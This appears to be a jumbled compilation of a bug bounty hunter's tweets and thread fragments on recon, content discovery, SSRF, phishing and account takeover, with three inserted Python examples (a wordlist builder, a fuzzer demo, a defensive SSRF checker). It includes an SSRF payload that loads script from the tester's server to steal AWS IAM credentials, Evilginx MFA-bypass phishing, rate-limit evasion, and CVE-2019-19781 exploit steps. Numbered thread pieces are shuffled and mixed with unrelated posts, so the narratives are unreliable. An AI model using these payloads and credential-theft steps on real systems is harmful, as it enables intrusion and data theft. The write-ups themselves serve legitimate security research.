In 2010, WikiLeaks released a classified document.
A list of infrastructure critical to U.S. national security.
The government listed a Trans-Atlantic cable.
3 years ago,
19-year-old me gained ADMIN access to that cable (and another; shared codebase).
🧵Here's how I found it
I'm uncomfortable tweeting stuff like this out, but...
I found a critical vulnerability in @opensea this weekend and reported it through @Hacker0x01.
They fixed the issue within 3 hours of reporting and I just got this notification👏🫢
I hacked a large company (70k+ employees) through social engineering. Legally of course.
• I set up the infrastructure
• Scraped names & emails with LinkedIn
• Sent 200 phishing emails.
I had access to their AWS console within 2 minutes.
And much more:
I've spent the last 8 years hacking companies (legally).
Now, I'm starting a mattress company.
I'm taking on a $16B industry to solve a huge problem.
Here's why:
Apparently there was an internal network share that contained powershell scripts...
"One of the powershell scripts contained the username and password for an admin user in Thycotic (PAM). Using this I was able to extract secrets for all services, DA, DUO, Onelogin, AWS, GSuite"
Anyone can hack.
Yes, anyone.
You can hack. Big companies. With little to no technical skills. And make thousands of dollars. Legally.
It requires some common sense & a web browser.
Note: DON'T do this to websites unless you have permission! It's illegal.
Here's how:
I hacked the military.
A system containing the information of military personnel.
Yet, the hack was done legally.
Here's how I did it and how it was done legally:
I'm not trying to brag, I never share bounty amounts – but I'm literally shaking right now and wanted to share my amazement.
I'm super duper lucky and blessed to have found this 🙏
Who's your phone provider?
Well, there's a good chance that I've hacked them!
Last year, I breached a major telecom company (many times...)
This time, I stole the data of every employee.
(well, I didn't steal all of it, but I could've)...
Here's how I did it:
302 Military FTP servers.
Imagine you had access to 302 military FTP servers.
What data could possibly be on them?
Who would get hurt by that data?
Who would it benefit?
5 years ago,
A 17-year-old gained access to 300 military FTP servers.
Here's how I did it:
You can find easy critical vulnerabilities.
It just takes finding unique attack surfaces.
Here's an example of how you can, using a story of how I hacked a car company:
Lessons:
- Context is King. THINK!
- To break you must first understand: Know your target's technologies & the services they use.
- Learn to code.
Top:
Are you into web hacking?
If so, you must have technology-specific wordlists
If not, you're missing obvious vulnerabilities.
Don't believe me?
Let's look at an information disclosure in an ASP[.]NET Core site:
Authorization.
Easy to understand. Critical if implemented incorrectly.
Want to see an example? (dumb question Corben, yes, why not)
Last month, I found an auth bypass that led to a full account takeover.
Here's how I found it:
See a host that's redirecting to Single-Sign on?
Don't skip it.
Do Content-Discovery.
Use gau.
Then ffuf.
You will be surprised at the misconfigurations you'll find.
And the things you can access (that you shouldn't be able to).
It's easy to find attack surfaces that others haven't.
You just need to think creatively.
"But Corben, I don't know how!"
That's what I'm here for.
I'll share some simple methodology that works.
(so you can find vulnerabilities...and make money)
A story:
TLDR;
- Participating in a bug bounty program (telecommunications company)
- Scanned their IPV4 Ranges
- Found a webserver that said "███ Cable System"
- Directory brute-force found /admin/accounts/
- The endpoint set a valid admin JSESSIONID.
What happens when you combine hackers and phones?
Phreaking?
Social Engineering?
Sure! Valid answers.
What you didn't think of is web vulnerabilities.
XXE.
I found an XXE by phone call in a bug bounty program.
Here's the story:
1/ The scope of this program was *.███.com
With a wildcard, basic recon is:
Subdomain Enumeration + HTTP server probing:
$ subfinder -d example[dot]com | httpx -o example.httpx
🚨 429 Too Many Requests.
You've been here before.
Getting rate-limited is THEE. WORST.
Thankfully, you can easily bypass it.
In most cases.
FireProx (by @ustayready) lets you use a different IP for every request (using AWS).
It's simple to use too:
6/ I eventually found 5 other similar issues that leaked:
• Customer names, phone numbers
• Payment details (cards, amounts, dates of payments)
• Etc.
I reported them all to their bug bounty program and they duplicated them into one report and eventually fixed the issues.
Attack surface is larger than you’d expect.
Most companies have domain names that they use internally (for development, QA, etc). Ex, PayPal uses “”
Here's how you can find network misconfigurations and find "internal assets" on the public internet:
I've made over 100k on SSRF vulnerabilities.
They aren't always as simple as pointing it at localhost or AWS Metadata service.
Here are some tricks I've picked up over the past 5 years of web app testing:
Directory-brute forcing?
You should NEVER filter based on status code.
Paths can exist and return a 404.
I’ve seen this so many times:
/noexist/ -> 404 Not Found.
/api/ -> 404 Not Found, but different response body (JSON formatted)
/api/endpoint -> 200 OK
Filter by
Most companies have domain names that they use internally (for development, QA, etc). For example, PayPal uses "". I've seen so many network misconfigurations and you can find these juicy internal hosts on the public internet. 1/🧵
✋Traditional file & directory brute-forcing can only get you so far.
👉 Here's an easy way to generate target-based wordlists with gau and @tomnomnom's unfurl:
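The wordlist generation that gau + unfurl do on the command line, as an added example in plain Python (this is not Corben Leo's script and not part of gau or unfurl). It takes a list of known URLs, drops numeric ID segments, and emits three target-specific lists: path segments, query-parameter names, and file extensions, which is what you feed to ffuf next. The URLs in SAMPLE_URLS are constructed stand-ins for gau output; in practice pipe gau's output in on stdin.

```python
"""Build target-specific wordlists (paths, parameter names, extensions) from known URLs.

Added example, not the author's script and not gau/unfurl themselves. Standard
library only. SAMPLE_URLS is constructed input standing in for `gau` output.
"""
import re
import sys
from urllib.parse import parse_qsl, urlsplit

# Constructed sample of what `gau example.com` might return (hypothetical host/paths).
SAMPLE_URLS = [
    "https://example.com/api/v2/users/123/profile?tab=billing&format=json",
    "https://example.com/api/v2/users/456/avatar.png",
    "https://example.com/admin/accounts/",
    "https://dev.example.com/myaccount/modals/view_call_log_details_modal.jsp?subscriberId=42",
    "https://example.com/static/js/app.bundle.js",
    "https://example.com/api/v2/users/123/profile?tab=security",
]

NUMERIC = re.compile(r"^\d+$")  # bare IDs like /users/123 are noise in a wordlist


def extract_words(urls):
    """Return (path_segments, param_names, extensions), each sorted and de-duplicated."""
    paths, keys, exts = set(), set(), set()
    for url in urls:
        parts = urlsplit(url.strip())
        for seg in (s for s in parts.path.split("/") if s):
            if NUMERIC.match(seg):
                continue
            paths.add(seg)
            if "." in seg:
                exts.add(seg.rsplit(".", 1)[1].lower())
        # keep_blank_values so `?debug=` still yields the key "debug"
        for key, _ in parse_qsl(parts.query, keep_blank_values=True):
            keys.add(key)
    return sorted(paths), sorted(keys), sorted(exts)


def path_prefixes(urls):
    """Directory prefixes (api, api/v2, api/v2/users, ...) with ID segments removed,
    useful as a base-directory list for a second round of brute-forcing."""
    prefixes = set()
    for url in urls:
        segs = [s for s in urlsplit(url.strip()).path.split("/") if s and not NUMERIC.match(s)]
        # the last segment is a leaf (file or endpoint), so only its parents are directories
        for i in range(1, len(segs)):
            prefixes.add("/".join(segs[:i]))
    return sorted(prefixes)


if __name__ == "__main__":
    urls = [line for line in sys.stdin] if not sys.stdin.isatty() else SAMPLE_URLS
    paths, keys, exts = extract_words(urls)
    for name, words in (("paths", paths), ("params", keys), ("exts", exts), ("dirs", path_prefixes(urls))):
        with open(f"{name}.txt", "w") as fh:
            fh.write("\n".join(words) + "\n")
        print(f"{name}: {len(words)} entries")
```

Usage: `gau example.com | python3 wordlist.py` writes paths.txt, params.txt, exts.txt and dirs.txt; then `ffuf -u https://host/FUZZ -w paths.txt` or `-w dirs.txt:DIR -w paths.txt:FUZZ -u https://host/DIR/FUZZ`. Numeric segments are dropped on purpose: you want the shape of the routes, not one user's IDs.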
You're using Burp Collaborator wrong.
Don't use Burp's default collaborator instance when testing for out of band vulnerabilities.
Many companies use egress filtering & block outbound traffic to the default collaborator domain
It's worth setting up a
I just rewrote and now released subjs v1.0.0 (). Javascript files can contain an abundance of valuable information when hacking – from undocumented API endpoints to secrets – if you aren't digging through them, you need to!
#bugbountytips
1/ I used Evilnginx2 to bypass MFA (Okta & Duo)
From Okta, I could access Outlook, Sharepoint, Github, & many more services on behalf of the 50+ employees that fell for the phish.
I was blown away by how easy it was to pull off this "hack" that could've impacted 60M+ people.
You're probably directory brute-forcing wrong.
You should be methodical when targeting frameworks such as Express, Rails, Flask, Django, etc.
2/ By default, ffuf uses the GET HTTP method.
You should be fuzzing with different HTTP methods.
Try using a wordlist multiple times
3/ After spidering the site with Burp, I eventually came across an old Javascript file.
This javascript contained a reference to a JSP file with a name that indicated similar functionality:
"/myaccount/modals/view_call_log_details_modal.jsp"
1/ I've been in this bug bounty program for quite some time.
I previously bought a phone plan so I could login and test functionality as an authenticated user.
In the dashboard, there was a tab to view your call logs.
The DoD experienced its largest leak in 10 years.
Jack Teixeira shared highly classified military documents on Discord.
He was arrested.
3 years ago, a 20-year-old kid found a vulnerability that leaked confidential aircraft & missile information.
Here's how I did it:
getallurls - fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl:
Quick script that I use religiously for content discovery.
Oof.
The gal sitting next to me on the plane works for a pretty big company.
She’s got a spreadsheet open on her computer…
And it’s got passwords lol
Company2021@
2/ The URL contained a parameter called "subscriberId".
It contained a numerical ID, so obviously I tried to change it to another user's.
Unfortunately, it didn't work.
Understanding how systems work is a competitive advantage as a hacker.
How do you get to this point?
Build.
Code a complex, modern application that relies on:
-> a database
-> caching/memory-store (redis)
-> message broker (rabbitmq)
etc.
Deploy it.
1. Try other URL schemes:
• file:// (file read)
• netdoc:// (file read)
• dict://
• gopher://
• jar://
• ldap://
• and more!
You might be able to get file read.
Or send multi-line requests to gain additional impact
(Ex: gopher + redis = likely RCE)
4/ So, I visited the endpoint:
The page loaded, and in the response I saw my call logs:
Hm. What happens if I try to change the subscriberId to someone else's here?
Super excited to announce that I've joined @assetnote as a software engineer! Stoked to work with great people like @infosec_au and on an amazing product 🎉
2/ I searched the company's name on bgp.he.net
Saved their IP ranges.
I ran @ErrataRob's masscan, probed for HTTP(s) servers, and grabbed the HTTP titles.
Looked something like:
$ masscan -p 80,443 -iL ranges -oL out.txt
$ cat out.txt | httpx -title
One title stuck out:
1. I started with reconnaissance:
- Subdomain enumeration to find the company's subdomains.
- HTTP server probing to see what's online
$ subfinder -d example[dot]com | httpx -o target.httpx
I came across a webserver running IIS:
hxxps://installersupport.██████.com/
CVE-2019-19781 is this easy:
1. Traversal to vpns folder, traversal in the NSC_HEADER + to write a malicious bookmark to the /netscaler/portal/templates/ folder (1st HTTP request),
2. Passing that template through the Template Toolkit (2nd request)
I've re-written gau! This includes speed improvements, a new provider (urlscan), loading options from configuration files, new filter support, socks5 proxy support, and more!
Make sure to grab the new version!
8/ Redirected to the home page.
Second visit:
> HTTP/1.1 200 OK
> --- snip ---
> <title>Account Administration</title>
HOLY **** IT WORKED.
This is a HIGHLY redacted version of what I saw:
So,
Internal assets = sensitive.
Apps meant for internal usage usually have weaker security than those facing the external.
Sometimes, internal assets aren't so internal.
Here's how you can find such misconfigurations:
1/ It began with a bug bounty program.
Of a telecommunications company (that I can't name publicly).
As some of you may know, I love recon.
I had already done subdomain enumeration.
The next step was to scan their IP ranges.
So,
14/ I verified they worked:
$ export AWS_ACCESS_KEY_ID=
$ export AWS_SECRET_ACCESS_KEY=
$ export AWS_SESSION_TOKEN=
$ aws sts get-caller-identity
The keys worked.
And Scout2 proved I had access to too much :)
4/ Look at the code in this picture.
Routes are defined explicitly. In this example:
You must GET /one to get a response.
You must POST /two to get a valid response.
Brute-force with API routes and dictionary words.
(PS: @assetnote wrote about Contextual Content Discovery)
Someone hacked an Uber employee's HackerOne account and is commenting on all of the tickets. They likely have access to all of the Uber HackerOne reports.
9/ I clicked through the menus to see if I was actually authenticated.
I was. FULLY. AUTHENTICATED.
On that same IP range,
They had ANOTHER system for ANOTHER cable.
I tried the same attack.
IT WORKED!
I had admin access to TWO. Different. Cables.
I was in disbelief.
So,
2/ HTTPX gave me 300 web-servers to target.
One stuck out to me:
hxxps://rendering-prd.redacted[.]com
"rendering" stuck out to me. Why?
Render means to "process information". Often to another format.
With web apps, it's typically HTML to another format.
Note: this is all alleged. I found the Telegram in this email that the hacker sent out via an Uber employee's HackerOne account (via policy update). I've obviously got nothing to do with it and have not reproduced or confirmed any of this.
Update: A Threat Actor claims to have completely compromised Uber - they have posted screenshots of their AWS instance, HackerOne administration panel, and more.
They are openly taunting and mocking @Uber.
1/
Become a dev (to break you must understand):
• Read "Mastering Ethereum" (It's on GitHub)
• Learn Solidity:
• CryptoZombies
• solidity-by-example[.]org
• Solidity Docs
• Learn how to use HardHat
• Familiarize yourself with widely used contracts (EIP 20)
Announcing the public release of my tool secretz! Written during our research of TravisCI, secretz is a tool that minimizes the large attack surface of Travis CI. It automatically fetches repos, builds, and logs for any given organization. Check it out:
5/ The directory /admin/
Remember, it's running Apache Tomcat.
I built a wordlist for .jsp files using BigQuery. (Learned from @assetnote's commonspeak)
Bruteforcing found a few JSP files, but they all redirected to the login page.
Gah. Well,
Companies run software they don't write.
Ex: Jira, GoAnywhere, etc.
Finding vulns in these types of software = lots of vuln targets = $$$
So, do code review!
Need the source? Find the software AWS's AMI Catalog.
Launch a server. SSH in. Pull it. Review it
5/ You also must brute-force with different HTTP methods.
I love @joohoi's FFUF for directory/endpoint brute-forcing.
By default, ffuf uses the GET method.
So, I started with that and filtered by the number of response words (6) on the 404 page:
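The two rules in the tweets above (never filter on status code, fuzz every method against explicitly defined routes) in one runnable form. This is an added example, not the author's ffuf commands and not ffuf itself: a throw-away local server with explicit routes stands in for an Express/Rails-style app, and a tiny fuzzer filters hits by response word count instead of status code, the way `ffuf -fw <n>` does. The routes, bodies and wordlist are all constructed.

```python
"""Content discovery that ignores status codes and fuzzes several HTTP methods.

Added example (not the author's commands, not ffuf). A local server with
explicitly defined routes stands in for the target; the fuzzer keeps any
(method, path) whose response word count differs from a known-missing path,
so a 404 with a different body (e.g. JSON from a real /api/ prefix) is a hit.
"""
import json
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Constructed target: framework-style 404 page, plus three explicit routes.
NOT_FOUND_HTML = ("<html><body><h1>Not Found</h1><p>The requested URL was not "
                  "found on this server.</p></body></html>")
ROUTES = {
    ("GET", "/one"): (200, "text/plain", "route one is only reachable with GET"),
    ("POST", "/two"): (200, "text/plain", "route two is only reachable with POST"),
    # exists, but still answers 404: status-code filtering would throw it away
    ("GET", "/api/"): (404, "application/json",
                       json.dumps({"error": "unknown resource", "code": 404})),
}


class Handler(BaseHTTPRequestHandler):
    def _route(self):
        status, ctype, body = ROUTES.get((self.command, self.path),
                                         (404, "text/html", NOT_FOUND_HTML))
        data = body.encode()
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    do_GET = do_POST = do_PUT = _route

    def log_message(self, *args):  # keep the demo output quiet
        pass


def fetch(base, method, path):
    """Return (status, body) and treat 4xx/5xx like any other response."""
    req = Request(base + path, method=method, data=b"" if method != "GET" else None)
    try:
        with urlopen(req, timeout=5) as resp:
            return resp.status, resp.read().decode()
    except HTTPError as err:
        return err.code, err.read().decode()


def fuzz(base, wordlist, methods=("GET", "POST")):
    """Baseline on a path that cannot exist, then keep everything whose word count differs."""
    baseline_words = len(fetch(base, "GET", "/definitely-not-here-7f3a")[1].split())
    hits = []
    for word in wordlist:
        for method in methods:
            status, body = fetch(base, method, "/" + word)
            words = len(body.split())
            if words != baseline_words:
                hits.append((method, "/" + word, status, words))
    return baseline_words, hits


def start_server():
    srv = ThreadingHTTPServer(("127.0.0.1", 0), Handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


def run_demo(wordlist=("one", "two", "api/", "admin")):
    srv, base = start_server()
    try:
        return fuzz(base, list(wordlist))
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    baseline, hits = run_demo()
    print(f"404 baseline: {baseline} words")
    for method, path, status, words in hits:
        print(f"{method:5} {path:8} -> {status} ({words} words)")
```

Run it and GET /one, POST /two and GET /api/ all surface, while GET /two and POST /one are correctly dropped; the last hit is a 404 that a `-mc 200` style filter would have hidden. With ffuf the equivalent is `-X POST` per method and `-fw <baseline>` instead of `-mc`.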
2/ Learn networking.
@three_cube has some amazing FREE resources on his website.
Google "Network Basics for Hackers" and go through all of the posts.
Here, learn TCP/IP basics, Subnetting, Network Masks, DNS, HTTP, etc.
BORING? Maybe. But this knowledge is invaluable.
2/ Phishing attacks are on the rise and are becoming more sophisticated.
Last year we saw Uber, Dropbox, Twilio, Axie Infinity ($625M theft), and more compromised through phishing.
People argue that humans are the "weakest link", yet, companies of all sizes still rely on:
10/ Success.
I got a request to /test.js with the User-Agent: Chrome/75.x.xx
Running "whois" on the requesting IP address showed it was from AWS.
AWS has a meta-data server at 169.254.169.254.
It can be used to generate temporary access keys.
To an AWS environment.
12. I wanted to verify that this data was fresh.
So, In the mobile app, I created another account.
I targeted the new account and it worked!!
I reported it to the company's bug bounty program on @Hacker0x01. They fixed it and I was eventually rewarded for it!
4/ "login.jsp"
Ok! It was a Tomcat webserver
I didn't have credentials. Obviously.
I started with directory brute-forcing.
Used @joohoi's ffuf & filtered by the number of response words on the 404 page.
It found several directories.
One that stuck out was
Information is key.
What sort of information could be in an Air Force database?
Who would get hurt by that data?
Who would it benefit?
5 years ago, 17-year-old me easily gained access to an Air Force database.
Legally, through
Here's how I did it:
3/ Forcing the consumption of cartoon training videos twice a year & hoping their SEG works.
While some organizations are moving towards FIDO2, many aren't & can't.
Companies aren't effectively equipping their employees to recognize & avoid the latest real-world threats.
Do you have any "Oh Sh*t" moments?
Here's one of mine from a year or two ago.
The time I took down an API. A production API.
Of an advertising company...On a Saturday...(and it stayed down for hours...)
Here's what happened:
12/ Headless browsers don't care.
So, I tried this javascript
POST /render HTTP/1.1
markup=<script src="hxxps://myserver/pwn.js"></script>
The server responded: 200 OK
Checked Burp Collaborator and it worked! My server had a request to "/main-production-worker-iam-role"
So
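The check the server side of a /render (or any fetch-a-URL) feature should have done, as an added example that covers the SSRF tricks in the threads above: the alternative schemes (file://, gopher://, dict://, ...), the 169.254.169.254 metadata service, and hostnames that resolve to internal ranges. This is not code from the author or from any target mentioned; the resolver is injected so the demo runs offline, and every hostname and address in FAKE_DNS is constructed.

```python
"""Hardened outbound-URL check for SSRF-prone features (render, webhook, import-by-URL).

Added example, not the author's code. Rejects non-http(s) schemes, resolves the
host itself, and refuses loopback, link-local (169.254.169.254), private and
other special-purpose addresses, including IPv4-mapped IPv6 forms. Returns the
resolved addresses so the caller can pin the connection to them.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed resolver data for the offline demo (hypothetical names).
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "metadata.internal.example": ["169.254.169.254"],
    "rebind.example": ["93.184.216.34", "10.0.0.5"],  # one public, one private answer
}


def real_resolve(host):
    """Every address the name resolves to; getaddrinfo also normalises forms like
    '2130706433' or '0x7f000001' to 127.0.0.1, which is why we validate after resolving."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def fake_resolve(host):
    if host not in FAKE_DNS:
        raise socket.gaierror(f"constructed resolver: unknown host {host}")
    return FAKE_DNS[host]


def is_public_ip(ip):
    addr = ipaddress.ip_address(ip)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # ::ffff:169.254.169.254 is still the metadata service
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_outbound_url(url, resolve=real_resolve):
    """Return (True, [ips]) if the URL may be fetched, else (False, reason)."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        ips = [str(ipaddress.ip_address(host))]  # literal IP, no lookup needed
    except ValueError:
        try:
            ips = resolve(host)
        except OSError as err:
            return False, f"resolution failed: {err}"
    if not ips:
        return False, "name resolved to nothing"
    for ip in ips:
        if not is_public_ip(ip):
            return False, f"{host} resolves to non-public address {ip}"
    return True, ips


def demo():
    cases = [
        "file:///etc/passwd",
        "gopher://127.0.0.1:6379/_SET",
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "http://[::ffff:169.254.169.254]/latest/meta-data/",
        "http://metadata.internal.example/",
        "http://rebind.example/",
        "https://example.com/page",
    ]
    return {url: check_outbound_url(url, fake_resolve) for url in cases}


if __name__ == "__main__":
    for url, (ok, detail) in demo().items():
        print(("ALLOW " if ok else "BLOCK "), url, "->", detail)
```

Two caveats a reviewer would raise: resolve once and connect to the returned address (a second lookup at connect time reopens the DNS-rebinding hole), and do not follow redirects, since a 302 to 169.254.169.254 is the classic way past a check like this. A headless browser used for rendering does neither by default, which is why the /render endpoint in the thread needed a network-level egress block, not just a URL filter.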
Finding vulnerabilities first = you get paid.
Want to be the first to hack on new functionality? Monitor your target’s JS files for new paths or parameters.
(automate with a headless browser to grab all dynamically loaded JS)